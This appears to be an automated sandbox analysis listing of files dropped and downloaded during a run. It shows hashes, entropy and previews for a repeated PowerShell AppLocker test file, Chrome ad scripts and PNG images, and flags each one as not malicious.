                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):55
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3533)
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):226660
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.451557875371089
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:BFufmdIbWdPP9g+iC+2OSKI4p/hpkWI4jchv:aedIeeScwv
                                                                                                                                                                                                                                                                                                                      MD5:B8F73CA15B82A59E06E0AFD7AFD4732B
                                                                                                                                                                                                                                                                                                                      SHA1:785735EE29AE9815BE63D99530439F698CE08EB9
                                                                                                                                                                                                                                                                                                                      SHA-256:0661EECDC8F9A86CBEAB346D02D85524CFAD9FA7E159EB9B10BDF5F58FFE86F1
                                                                                                                                                                                                                                                                                                                      SHA-512:4C026E1E1DDB622F4578BFEE979FECE8CA2FABE9AD13CD3CDF983B8975EE91339415F73076DBC6407C64CA0B801EA0C18605BE783B30C27212E8AD92E553164F
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:(function(){var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");},da=.ca(this),p=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.p("Symbol",function(a){if(a)return a;var b=function(f,g){this.Jg=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.Jg};var c="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",d=0,e=function(f){if(this instanceof e
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2093)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):445169
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.576763109779436
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:UrLbjvudFZTeHPGv7maR3WCdt4+/x3149jaxfR1tKaGcK0h3XJyx0sC1KP9IjYFv:UrLbjvudFZTeHPGv7maR3Wgt4+/x314P
                                                                                                                                                                                                                                                                                                                      MD5:47CE2929610695531FCE8681456CA07B
                                                                                                                                                                                                                                                                                                                      SHA1:E9D9423F2E24886C0E0F21D5F54AE5B0B0573B4F
                                                                                                                                                                                                                                                                                                                      SHA-256:E45BD4331AF73638C4934B6A1D12BFAC55D18CC484E23D69C39BFD4876582B96
                                                                                                                                                                                                                                                                                                                      SHA-512:58D880492F44C4FD1D24337E8401F031C89D35E4DA9E264B119F2C47D11EC606E563C7AC4F39BAB943E5015BA0B0387CA1FD86D239C7EB3CCE3E80415B2BEB76
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://pagead2.googlesyndication.com/pagead/managed/js/adsense/m202410240101/show_ads_impl_fy2021.js
                                                                                                                                                                                                                                                                                                                      Preview:(function(sttc){'use strict';var q,aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} .var ca=ba(this),da=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",ea={},fa={};function ia(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ja(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in ea?f=ea:f=ca;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=da&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?aa(ea,d,{configurable:!0,writable:!0,value:b}):b!==c&&(fa[d]===void 0&&(a=Math.random()*1E9>>>0,fa[d]=da?ca.Symbol(d):"$jscp$"+a+"
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):205
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.471232950817362
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:6:6v/lhPmvbPM6ArwrgPowQka3cQhWb8i4NI1Q/2up:6v/7OvzZ6IRwIcQEb7461Q2c
                                                                                                                                                                                                                                                                                                                      MD5:4087858E2C9DB9AA8F6A840AEDCFB533
                                                                                                                                                                                                                                                                                                                      SHA1:D1FFE861DA6BD0E95FD1A365B0C3D3CEB6CD58A3
                                                                                                                                                                                                                                                                                                                      SHA-256:4D45982F2DC34F36C9045EE46A75A1943666BB7FD64E103CAC8C7429E7012840
                                                                                                                                                                                                                                                                                                                      SHA-512:541228667C513266FFAC017AA43CCACEA410E20BF27D30599276E9984FAC2C433AC58288C19F7A5BFEB1C9B4074B8C9C472080BF1C706303F97B2CE73DBD634F
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://www.gstatic.com/images/icons/material/system/2x/feedback_grey600_24dp.png
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...0...0.......1.....IDATx...1..1.DQ.f....@H.....%`..j.M&"....5....;...;.......\.....\..U.4..pe.<.P.....%... ...@....p.....@...X...5..{.$.x^....y=..z.......|.......+.........IEND.B`.
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1200 x 628, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):8408
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.45689599658159
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:96:MdN09f9qB+ejVmTSiMYAJLCc7466kYuZMXcOmAa4mVxrcuQPvsvtKWiqxjUBqfCz:MdWu2PMLLCX66k51qmHISVi/Bnzyvgl
                                                                                                                                                                                                                                                                                                                      MD5:111C3C3166CD346227E1B8DF135C02B5
                                                                                                                                                                                                                                                                                                                      SHA1:C85469F31C39294A19497B2BBC77E3828670BA47
                                                                                                                                                                                                                                                                                                                      SHA-256:53C2BE47E0400F4B66686EF32CB9C6B726720EBD16B81B2AA1A883CC83F8C59E
                                                                                                                                                                                                                                                                                                                      SHA-512:AEB83AC0BB3BC705C3F9E074B2253A085997D95C1530CFBF7387E07579B24A014016FD2FB8B9C63941A6B5F653A975BBA84AD4B6B50CD22E97F504618842D871
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://tpc.googlesyndication.com/simgad/12056283273911786548/14763004658117789537
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.......t.....5V*e....PLTE.w.......................................y.....M|..........,..k.....z..(.....:.....W...{.............&........=..l...........a...........E..O.....s.....x...h..\..w................W.1.....iTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x='adobe:ns:meta/'>. <rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang='x-default'>VIEW - 1</rdf:li>. </rdf:Alt>. </dc:title>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2024-08-02</Attrib:Created>. <Attrib:ExtId>f2021086-289e-41ea-b556-3cdc24c81957</Attrib:ExtId>. <Attrib:FbId>525265914179580</Attrib:FbId>. <Attrib:TouchT
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cm.g.doubleclick.net/pixel?google_nid=one_tag&google_hm=&google_push=AXcoOmSBEqLcMQ1_a7fW7NcT2Iei-MG31IkeZEJ4zsIXZrw5PAIP7aNgsrC8sU8h46pHu40uiZnbXPrhr6kfd4hGeSk-YKS5ry9iw6eT
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 970 x 250, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):17192
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.482450703523413
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:384:G8bygBLbqUgNX8BSHqwai/fffr2xq4pwpjjKidNi/:zBcqBSHfNjXVlRnI
